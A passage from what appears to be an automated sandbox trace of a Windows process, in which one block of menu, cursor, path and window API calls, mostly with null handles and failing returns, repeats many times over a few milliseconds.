param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.622] GetStockObject (i=6) returned 0x1b00018 [0027.622] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.622] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.622] PathFileExistsW (pszPath=0x0) returned 0 [0027.622] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.622] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.622] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.622] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.622] GetMenu (hWnd=0x0) returned 0x0 [0027.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.623] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.623] GetStockObject (i=6) returned 0x1b00018 [0027.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.623] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.623] PathFileExistsW (pszPath=0x0) returned 0 [0027.623] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.623] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.623] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.623] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.623] GetMenu (hWnd=0x0) returned 0x0 [0027.623] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.623] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.623] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.623] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.623] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.623] GetStockObject (i=6) returned 0x1b00018 [0027.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.623] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.623] PathFileExistsW (pszPath=0x0) returned 0 [0027.623] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.623] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.623] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.623] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.623] GetMenu (hWnd=0x0) returned 0x0 [0027.623] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.623] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.623] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.623] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.623] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.623] GetStockObject (i=6) returned 0x1b00018 [0027.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.624] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.624] PathFileExistsW (pszPath=0x0) returned 0 [0027.624] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.624] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.624] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.624] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.624] GetMenu (hWnd=0x0) returned 0x0 [0027.624] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.624] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.624] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.624] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.624] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.624] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.624] GetStockObject (i=6) returned 0x1b00018 [0027.624] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.624] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.624] PathFileExistsW (pszPath=0x0) returned 0 [0027.624] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.624] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.624] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.624] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.624] GetMenu (hWnd=0x0) returned 0x0 [0027.624] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x291) returned -1 [0027.624] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.624] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.624] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.624] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.624] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.624] GetStockObject (i=6) returned 0x1b00018 [0027.624] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.624] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.624] PathFileExistsW (pszPath=0x0) returned 0 [0027.624] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.624] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.625] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.625] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.625] GetMenu (hWnd=0x0) returned 0x0 [0027.625] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.625] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.625] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.625] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.625] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.625] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.625] GetStockObject (i=6) returned 0x1b00018 [0027.625] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.625] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.625] PathFileExistsW (pszPath=0x0) returned 0 [0027.625] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.625] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.625] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.625] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.625] GetMenu (hWnd=0x0) returned 0x0 [0027.625] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.625] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.625] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.625] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.625] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.625] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.625] GetStockObject (i=6) returned 0x1b00018 [0027.625] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.625] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.625] PathFileExistsW (pszPath=0x0) returned 0 [0027.625] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.625] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.625] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.625] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.625] GetMenu (hWnd=0x0) returned 0x0 [0027.625] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.626] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.626] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.626] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.626] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.626] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.626] GetStockObject (i=6) returned 0x1b00018 [0027.626] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.626] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.626] PathFileExistsW (pszPath=0x0) returned 0 [0027.626] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.626] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.626] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.626] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.626] GetMenu (hWnd=0x0) returned 0x0 [0027.626] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.626] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.626] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.626] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.626] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.626] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.626] GetStockObject (i=6) returned 0x1b00018 [0027.626] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.626] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.626] PathFileExistsW (pszPath=0x0) returned 0 [0027.626] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.626] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.626] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.626] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.626] GetMenu (hWnd=0x0) returned 0x0 [0027.626] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x57d) returned -1 [0027.626] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.626] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.626] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.626] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.627] GetStockObject (i=6) returned 0x1b00018 [0027.627] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.627] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.627] PathFileExistsW (pszPath=0x0) returned 0 [0027.627] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.627] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.627] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.627] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.627] GetMenu (hWnd=0x0) returned 0x0 [0027.627] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.627] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.627] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.627] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.627] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.627] GetStockObject (i=6) returned 0x1b00018 [0027.627] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.627] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.627] PathFileExistsW (pszPath=0x0) returned 0 [0027.627] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.627] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.627] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.627] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.627] GetMenu (hWnd=0x0) returned 0x0 [0027.627] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.627] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.627] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.627] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.627] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.627] GetStockObject (i=6) returned 0x1b00018 [0027.627] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.627] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.627] PathFileExistsW (pszPath=0x0) returned 0 [0027.628] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.628] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.628] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.628] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.628] GetMenu (hWnd=0x0) returned 0x0 [0027.628] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.628] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.628] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.628] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.628] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.628] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.628] GetStockObject (i=6) returned 0x1b00018 [0027.628] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.628] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.628] PathFileExistsW (pszPath=0x0) returned 0 [0027.628] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.628] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.628] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.628] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.628] GetMenu (hWnd=0x0) returned 0x0 [0027.628] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.628] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.628] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.628] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.628] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.628] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.628] GetStockObject (i=6) returned 0x1b00018 [0027.628] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.628] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.628] PathFileExistsW (pszPath=0x0) returned 0 [0027.628] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.628] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.629] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.629] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.629] GetMenu (hWnd=0x0) returned 0x0 [0027.629] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x491) returned -1 [0027.629] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.629] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.629] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.629] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.629] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.629] GetStockObject (i=6) returned 0x1b00018 [0027.629] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.629] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.629] PathFileExistsW (pszPath=0x0) returned 0 [0027.629] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.629] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.629] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.629] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.629] GetMenu (hWnd=0x0) returned 0x0 [0027.629] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.629] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.629] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.629] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.629] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.629] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.629] GetStockObject (i=6) returned 0x1b00018 [0027.629] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.629] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.629] PathFileExistsW (pszPath=0x0) returned 0 [0027.629] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.629] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.629] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.629] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.629] GetMenu (hWnd=0x0) returned 0x0 [0027.629] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.630] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.630] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.630] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.630] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.630] GetStockObject (i=6) returned 0x1b00018 [0027.630] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.630] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.630] PathFileExistsW (pszPath=0x0) returned 0 [0027.630] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.630] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.630] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.630] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.630] GetMenu (hWnd=0x0) returned 0x0 [0027.630] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.630] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.630] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.630] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.630] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.630] GetStockObject (i=6) returned 0x1b00018 [0027.630] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.630] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.630] PathFileExistsW (pszPath=0x0) returned 0 [0027.630] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.630] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.630] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.630] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.630] GetMenu (hWnd=0x0) returned 0x0 [0027.630] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.630] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.630] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.630] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.631] GetStockObject (i=6) returned 0x1b00018 [0027.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.631] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.631] PathFileExistsW (pszPath=0x0) returned 0 [0027.631] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.631] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.631] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.631] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.631] GetMenu (hWnd=0x0) returned 0x0 [0027.631] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2b4) returned -1 [0027.631] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.631] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.631] 